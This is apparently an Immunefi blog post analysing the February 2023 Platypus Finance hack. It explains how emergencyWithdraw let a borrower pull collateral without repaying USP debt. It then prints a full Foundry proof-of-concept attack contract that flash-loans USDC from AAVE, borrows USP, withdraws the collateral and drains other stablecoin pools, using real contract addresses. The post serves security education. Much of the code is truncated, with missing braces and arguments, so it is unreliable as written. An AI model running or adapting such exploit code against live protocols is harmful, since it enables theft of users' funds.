Hack Analysis: Platypus Finance, February 2023


The Platypus Finance protocol was hacked on February 16, 2023, resulting in a loss of about $8.5m in stablecoin collateral to a logic error exploit. A flaw in the USP–Platypus’ stablecoin–-solvency check mechanism in the collateral holding contract allowed the attacker to borrow against flash loaned collateral and then withdraw it without paying the debt.

The attacker went on to swap the borrowed USP for existing liquidity in other stables inside Platypus pools. You can see the attack transaction here.

In this article, we will be analyzing the exploited vulnerability in the Platypus Finance contract, and then we’ll create our own version of the logic error exploit, testing it against a local fork. You can check the full PoC here.

This article was written by gmhacker.eth, an Immunefi Smart Contract Triager.


Platypus Finance is an AMM protocol on the Avalanche blockchain, and it’s specifically designed for exchanging stablecoins. They introduce the concept of asset liability management, where, upon withdrawal, liquidity providers can claim the exact amount of the same tokens they provided plus token emissions.

In the beginning of February 2023, the Platypus team announced the introduction of USP, Platypus Finance’s new native over-collateralized stablecoin. Users can deposit LP tokens from Platypus pools to mint USP tokens, bringing more capital efficiency to the protocol.

Root Cause

Having a rough understanding of what the Platypus Finance protocol is and how USP works, we can dive into the actual smart contract code to explore the root cause vulnerability leveraged in the February 2023 hack. To do that, we need to dive into the code of the MasterPlatypusV4 contract, Platypus’ Masterchef-like orchestrator. We’re particularly interested in the emergencyWithdraw function.

   function emergencyWithdraw(uint256 _pid) public nonReentrant {
       PoolInfo storage pool = poolInfo[_pid];
       UserInfo storage user = userInfo[_pid][msg.sender];

       if (address(platypusTreasure) != address(0x00)) {
           (bool isSolvent, ) = platypusTreasure.isSolvent(msg.sender, address(poolInfo[_pid].lpToken), true);
           require(isSolvent, 'remaining amount exceeds collateral factor');

       // reset rewarder before we update lpSupply and sumOfFactors
       IBoostedMultiRewarder rewarder = pool.rewarder;
       if (address(rewarder) != address(0)) {
           rewarder.onPtpReward(msg.sender, user.amount, 0, user.factor, 0);

       // SafeERC20 is not needed as Asset will revert if transfer fails
       pool.lpToken.transfer(address(msg.sender), user.amount);

       // update non-dialuting factor
       pool.sumOfFactors -= user.factor;

       user.amount = 0;
       user.factor = 0;
       user.rewardDebt = 0;

       emit EmergencyWithdraw(msg.sender, _pid, user.amount);

The emergencyWithdraw function in the MasterPlatypus contract allows a user to withdraw their LP tokens from a given pool without caring about rewards. A function meant for “EMERGENCY ONLY” — a classic place for a hacker to lurk in.

The only check done by this function is whether the user is solvent or not, using PlatypusTreasure.isSolvent. That function uses an internal function called _isSolvent. Let’s peek into it.

   function _isSolvent(
       address _user,
       ERC20 _token,
       bool _open
   ) internal view returns (bool solvent, uint256 debtAmount) {
       uint256 debtShare = userPositions[_token][_user].debtShare;

       // fast path
       if (debtShare == 0) return (true, 0);

       // totalDebtShare > 0 as debtShare is non-zero
       debtAmount = (debtShare * (
      totalDebtAmount + _interestSinceLastAccrue())) / totalDebtShare;
      solvent = debtAmount <= (
             _open ? _borrowLimitUSP(_user, _token) : _liquidateLimitUSP(_user, _token));

Importantly, we know that emergencyWithdraw only cares about the boolean solvent parameter of the return data. This variable is true if the user’s debt is less than or equal to its USP borrow limit. In other words, a user is considered solvent if it has enough collateral to pay for its debt.

Going back to the MasterPlatypus contract, we see that only having this check is quite the problem. A user being solvent means that its collateral can pay for its debt. However, withdrawing the collateral should not leave unpaid debt! Using the emergencyWithdraw function, any user with debt can withdraw all its collateral LP tokens without paying for USP previously borrowed with that same collateral, leaving the protocol in debt.

Proof of Concept

Now that we understand the vulnerability that compromised the Platypus Finance protocol, we can formulate our own proof of concept (PoC) of the exploit transaction. We will follow the hacker’s example and flash loan funds from AAVE so that we can borrow a good amount of USP.

We’ll start by selecting an RPC provider with archive access. For this demonstration, we will be using the free public RPC aggregator provided by Ankr. We select the block number 26343613 as our fork block, 1 block before the hack transaction.

Our PoC needs to run through a number of steps to be successful. Here is a high-level overview of what we will be implementing in our attack PoC:

  1. Flash loan 44M USDC from AAVE.
  2. Deposit the borrowed USDC into a Platypus pool to get LP tokens
  3. Deposit the LP tokens to the MasterPlatypus contract as collateral.
  4. Borrow as much USP as possible against the LP collateral.
  5. Execute emergencyWithdraw to get the LP collateral back without paying the debt.
  6. Use the LP tokens to withdraw the USDC initially borrowed from AAVE. These funds will be used to pay back the flash loan at the end of the transaction.
  7. Swap as much USP as possible for Platypus pool liquidity in the form of other stablecoins.

Let’s code one step at a time, and eventually look at how the entire PoC looks. We will be using Foundry.

The Attack

pragma solidity ^0.8.13;

interface IAaveLendingPool {
   function flashLoanSimple(
       address receiverAddress,
       address asset,
       uint256 amount,
       bytes calldata params,
       uint16 referralCode
   ) external;

interface IPlatypusPool {
   function deposit(
       address token,
       uint256 amount,
       address to,
       uint256 deadline
   ) external returns (uint256);
   function withdraw(
       address token,
       uint256 liquidity,
       uint256 minimumAmount,
       address to,
       uint256 deadline
   ) external returns (uint256);
   function swap(
       address fromToken,
       address toToken,
       uint256 fromAmount,
       uint256 minimumToAmount,
       address to,
       uint256 deadline
   ) external returns (uint256, uint256); 
   function assetOf(address token) external view returns (address);

interface IMasterPlatypusV4 {
   function deposit(
       uint256 _pid,
       uint256 amount
   ) external returns (uint256, uint256[] memory);
   function getPoolId(address _lp) external view returns (uint256);
   function emergencyWithdraw(uint256 _pid) external;

interface IPlatypusTreasure {
   struct PositionView {
       uint256 collateralAmount;
       uint256 collateralUSD;
       uint256 borrowLimitUSP;
       uint256 liquidateLimitUSP;
       uint256 debtAmountUSP;
       uint256 debtShare;
       uint256 healthFactor;
       bool liquidable;
   function positionView(
       address _user,
       address _token
   ) external view returns (PositionView memory);
   function borrow(address _token, uint256 _borrowAmount) external;

Let’s begin by creating our interfaces.sol file, where we will define the various functions we’re going to use on the protocol’s contracts and AAVE. We’re dealing with 4 different key contract ABIs: AaveLendingPool, PlatypusPoolMasterPlatypusV4 and PlatypusTreasure.

The AaveLendingPool contract is the flash loan provider for our PoC. The PlatypusPool contract is responsible for the issuance of LP tokens upon supplying liquidity, as well as swapping different tokens present in the protocol pools. The MasterPlatypusV4 contract allows the depositing of LP tokens to accrue rewards, and also implements the vulnerable emergencyWithdraw function. Finally, PlatypusTreasure allows the borrowing of USP against the supplied collateral.

Besides these interfaces, we will be using the standard ERC20 interface, which is provided in the forge-std library, and OpenZeppelin’s EnumerableMap, to simplify our PoC logic, given our lack of gas constraints.

pragma solidity ^0.8.13;

import "@openzeppelin/utils/structs/EnumerableMap.sol";
import "forge-std/interfaces/IERC20.sol";
import "forge-std/console.sol";
import "./interfaces.sol";

contract Attacker {
   using EnumerableMap for EnumerableMap.AddressToUintMap;

   // ERC20 tokens
   address constant USDT = 0x9702230A8Ea53601f5cD2dc00fDBc13d4dF4A8c7;
   address constant USDTe = 0xc7198437980c041c805A1EDcbA50c1Ce5db95118;
   address constant BUSD = 0x9C9e5fD8bbc25984B178FdCE6117Defa39d2db39;
   address constant DAIe = 0xd586E7F844cEa2F87f50152665BCbc2C279D8d70;
   address constant USDC = 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E;
   address constant USDCe = 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664;
   address constant USP = 0xdaCDe03d7Ab4D81fEDdc3a20fAA89aBAc9072CE2;

   // Others
   address constant AAVE = 0x794a61358D6845594F94dc1DB02A252b5b4814aD;
   address constant PLATYPUS_POOL = 0x66357dCaCe80431aee0A7507e2E361B7e2402370;
   address constant MASTER_PLATYPUS = 0xfF6934aAC9C94E1C39358D4fDCF70aeca77D0AB0;
   address constant PLATYPUS_TREASURE = 0x061da45081ACE6ce1622b9787b68aa7033621438;

   EnumerableMap.AddressToUintMap tokenToAmount;
   IPlatypusPool pool;
   IMasterPlatypusV4 master;
   IPlatypusTreasure treasure;

   constructor() {
       tokenToAmount.set(USDC, 2_500_000 ether);
       tokenToAmount.set(USDCe, 2_000_000 ether);
       tokenToAmount.set(USDT, 1_600_000 ether);
       tokenToAmount.set(USDTe, 1_250_000 ether);
       tokenToAmount.set(BUSD, 700_000 ether);
       tokenToAmount.set(DAIe, 700_000 ether);
       pool = IPlatypusPool(PLATYPUS_POOL);
       master = IMasterPlatypusV4(MASTER_PLATYPUS);
       treasure = IPlatypusTreasure(PLATYPUS_TREASURE);

   /* snippet */

As we can see from the above snippet, we define various different addresses on the Avalanche blockchain as constants in our contract. Specifically, we’re defining all the ERC20 tokens we’re going to use, AAVE’s pool and relevant Platypus contracts. We’re also going to create an AddressToUintMap variable–tokenToAmount–which will be used in the constructor to set tokens to amounts for swap. This is just a struct to help with the final swapping of USP for other stablecoin liquidity in the Platypus pools.

   function attack() external {
           44_000_000 * (10**IERC20(USDC).decimals()),

The entrypoint for our attack is the attack function. It just does one simple job–asking AAVE for a flash loan. We pass on the token we want to get, USDC, and the amount of funds, 44m. The AAVE lending pool will transfer those funds to us and then execute a callback function on our contract. This means AAVE expects us to implement a specific interface function called executeOperation.

    @dev AAVE flashloan callback
   function executeOperation(
       address asset,
       uint256 amount,
       uint256 premium,
       bytes calldata
   ) external returns (bool) {
       IERC20(asset).approve(PLATYPUS_POOL, amount);
       uint256 lpAmount = pool.deposit(
           block.timestamp + 1 minutes

       address lpToken = pool.assetOf(asset);
       IERC20(lpToken).approve(MASTER_PLATYPUS, lpAmount);

       uint256 poolId = master.getPoolId(lpToken);
       master.deposit(poolId, lpAmount);

       IPlatypusTreasure.PositionView memory pv = treasure.positionView(

       treasure.borrow(lpToken, pv.borrowLimitUSP);

       IERC20(lpToken).approve(PLATYPUS_POOL, lpAmount);
           block.timestamp + 1 minutes

       IERC20(USP).approve(PLATYPUS_POOL, IERC20(USP).balanceOf(address(this)));

           // avoid stack too deep
           address token;
           uint fromAmount;
           for (uint i; i < tokenToAmount.length(); i++) {
               (token, fromAmount) = tokenToAmount.at(i);
               console.log("Swap %s : %s", token, fromAmount);
                   block.timestamp + 1 minutes

       IERC20(asset).approve(AAVE, amount + premium);
       return true;

Once AAVE calls our callback function, we’re ready to use our newly received tokens to perform the attack logic. The functions we call will always do the transfer of tokens for us using ERC20.transferFrom, hence why we need to call ERC20.approve a bunch of times throughout our function. Let’s fit our logic into the steps we originally planned:

  1. Flash loan 44m USDC. Well, we are now inside the callback executed by the AAVE lending pool, so we’re already done with that.
  2. Deposit USDC into the Platypus pool to get LP tokens. We call PlatypusPool.deposit for this to happen. We specify the token address and the amount we want to deposit. We know these are USDC and 44m, but we also know AAVE will pass those values in the function inputs asset and amount, so we abstract that. You will see block.timestamp + 1 minutes being used a few times here for deadline inputs. This is a common input in such transactions, in essence to avoid the situation where validators or searchers hold signed transactions and execute them once certain market conditions are met. After the deadline is reached, the transaction will no longer work. Since we’re just building a PoC, the value is irrelevant, but we could potentially pass a delta of 1 minute.
  3. Deposit the LP tokens to the MasterPlatypus contract. For this, we need to call MasterPlatypusV4.deposit. We need both the poolId and the amount of LP tokens we have, but we also need to approve the spending of those tokens, so naturally we need the address of the LP token. The amount of tokens is returned in the deposit from the previous step. We can find the LP token address by calling PlatypusPool.assetOf(USDC), and we get the id of the pool by calling MasterPlatypusV4.getPoolId(LPtoken). We have all the necessary information to call deposit on the MasterPlatypus contract.
  4. Borrow USP. We will call PlatypusTreasure.borrow. Because we want to borrow as much USP tokens as our collateral allows, we need to check our borrowing limit. We query this value through the function positionView in the PlatypusTreasure contract. It will return a struct–PositionView which will have the information we want, so we just need to pass it to the borrow function.
  5. Execute emergencyWithdraw–the most important part of our exploit, yet also the simplest one. All we need to do is to call MasterPlatypusV4.emergencyWithdraw.
  6. Withdraw the original USDC. Since we have the LP tokens again in our possession, we can go to the PlatypusPool contract and redeem the underlying token–USDC–using the withdraw function.
  7. Swap USP for other stablecoins–to make our PoC code more succinct, we loop over the AddressToUintMap data we originally stored. For each of those records, we call PlatypusPool.swap to try to swap specific quantities of USP for a hopefully good amount of other stablecoins. Noteworthy, both the specific amounts for each token and the swap function inputs are the same as the values used by the original hacker.

Ending our logic, we call ERC20.approve on the quantity of USDC that AAVE needs to transfer from us to pay back the flashloan. We are also required to return true in our callback function so that the flash loan doesn’t revert, as per the rules of the lending pool contract.

This completes the entire exploit. If we add Foundry logs, our PoC amounts to only 136 lines of code. If we run this PoC against the forked block number, we will get the following assets:

  • USDC: 2,403,762
  • USDCe: 1,946,900
  • USDT: 1,552,550
  • USDTe: 1,217,581
  • BUSD: 687,369
  • DAIe: 691,984
  • USP leftovers: 33,044,533


The Platypus Finance exploit was among the hacks that kicked off the year 2023. The attack stresses the importance of proper validation, most importantly when it comes to special functions that break the normal flow.

In this particular case, we’ve learned how crucial it is for such functions, originally meant for emergency situations, to have all the necessary checks implemented and well tested. The vulnerability broke the assumption that collateral cannot be fully withdrawn while one has debt in the market. Extensive testing against such a critical assumption should be done, with the help of sketching all possible state transitions in user flows.

In a surprising turn of events, less than 24 hours after the exploit, the Platypus team, with the help of BlockSec, managed to accomplish a reverse hack against the attacker, recovering about $2.5m of stolen funds. Yet another crazy tale only the DeFi world could ever have thought of.

This is what our entire PoC looks like.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

import "@openzeppelin/utils/structs/EnumerableMap.sol";
import "forge-std/interfaces/IERC20.sol";
import "forge-std/console.sol";
import "./interfaces.sol";

contract Attacker {
   using EnumerableMap for EnumerableMap.AddressToUintMap;

   // ERC20 tokens
   address constant USDT = 0x9702230A8Ea53601f5cD2dc00fDBc13d4dF4A8c7;
   address constant USDTe = 0xc7198437980c041c805A1EDcbA50c1Ce5db95118;
   address constant BUSD = 0x9C9e5fD8bbc25984B178FdCE6117Defa39d2db39;
   address constant DAIe = 0xd586E7F844cEa2F87f50152665BCbc2C279D8d70;
   address constant USDC = 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E;
   address constant USDCe = 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664;
   address constant USP = 0xdaCDe03d7Ab4D81fEDdc3a20fAA89aBAc9072CE2;

   // Others
   address constant AAVE = 0x794a61358D6845594F94dc1DB02A252b5b4814aD;
   address constant PLATYPUS_POOL = 0x66357dCaCe80431aee0A7507e2E361B7e2402370;
   address constant MASTER_PLATYPUS = 0xfF6934aAC9C94E1C39358D4fDCF70aeca77D0AB0;
   address constant PLATYPUS_TREASURE = 0x061da45081ACE6ce1622b9787b68aa7033621438;

   EnumerableMap.AddressToUintMap tokenToAmount;
   IPlatypusPool pool;
   IMasterPlatypusV4 master;
   IPlatypusTreasure treasure;

   constructor() {
       tokenToAmount.set(USDC, 2_500_000 ether);
       tokenToAmount.set(USDCe, 2_000_000 ether);
       tokenToAmount.set(USDT, 1_600_000 ether);
       tokenToAmount.set(USDTe, 1_250_000 ether);
       tokenToAmount.set(BUSD, 700_000 ether);
       tokenToAmount.set(DAIe, 700_000 ether);
       pool = IPlatypusPool(PLATYPUS_POOL);
       master = IMasterPlatypusV4(MASTER_PLATYPUS);
       treasure = IPlatypusTreasure(PLATYPUS_TREASURE);

   function attack() external {
           44_000_000 * (10**IERC20(USDC).decimals()),

    @dev AAVE flashloan callback
   function executeOperation(
       address asset,
       uint256 amount,
       uint256 premium,
       bytes calldata
   ) external returns (bool) {
       IERC20(asset).approve(PLATYPUS_POOL, amount);
       uint256 lpAmount = pool.deposit(
           block.timestamp + 1 minutes

       address lpToken = pool.assetOf(asset);
       IERC20(lpToken).approve(MASTER_PLATYPUS, lpAmount);

       uint256 poolId = master.getPoolId(lpToken);
       master.deposit(poolId, lpAmount);

       IPlatypusTreasure.PositionView memory pv = treasure.positionView(

       treasure.borrow(lpToken, pv.borrowLimitUSP);

       IERC20(lpToken).approve(PLATYPUS_POOL, lpAmount);
           block.timestamp + 1 minutes

       IERC20(USP).approve(PLATYPUS_POOL, IERC20(USP).balanceOf(address(this)));

           // avoid stack too deep
           address token;
           uint fromAmount;
           for (uint i; i < tokenToAmount.length(); i++) {
               (token, fromAmount) = tokenToAmount.at(i);
               console.log("Swap %s : %s", token, fromAmount);
                   block.timestamp + 1 minutes

       IERC20(asset).approve(AAVE, amount + premium);
       return true;

   function logBalances() public view {
       address token;
       for (uint i; i < tokenToAmount.length(); i++) {
           (token,) = tokenToAmount.at(i);
               "Balance %s : %s",
               IERC20(token).balanceOf(address(this)) / (10**IERC20(token).decimals())
           "Balance USP : %s",
           IERC20(USP).balanceOf(address(this)) / (10**IERC20(USP).decimals())